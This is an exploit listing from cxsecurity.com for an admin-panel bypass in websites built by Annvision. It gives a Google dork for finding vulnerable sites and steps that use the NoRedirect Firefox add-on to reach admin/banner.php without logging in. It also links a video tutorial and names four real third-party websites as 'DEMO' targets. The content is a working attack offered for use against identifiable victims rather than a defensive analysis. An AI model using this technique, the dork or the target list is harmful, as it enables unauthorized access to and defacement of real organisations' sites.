Annvision - AdminBypass to banners

Published
Credit
Risk
2017.01.08
BlackErroR
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: intext:"web Developed by ,Annvision"

_____________________________________________________________
#Exploit Title: Annvision - AdminBypass(NoRedirect)
#Exploit Author : BlackErroR
#Telegram : @BlackErroR1
#Exploit Dork: intext:"web Developed by ,Annvision"
#Tested On: Win 7/Firefox
#VendorHomePage : http://annvision.com/
#Note: Download Tool [NoRedirect] On addons Mozilla Firefox
#Date: 2017/7/1
_______________________________________________________________

Descriptions :
~http://localhost:8080/admin/ => add this URL in NoRedirect
~Then Go to => http://localhost:80/admin/banner.php
~seccesfully Exploited...

Video tutorial : http://opizo.com/0uLRy0

______________________________________________________________
#DEMO

[+]http://www.primechoicelending.com/admin/banner.php
[+]http://kgmanthikad.com/admin/banner.php
[+]http://philadelphiachurchlondon.com/admin/banner.php
[+]http://www.meltourism.in/admin/banner.php

__________________________________________________________________


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com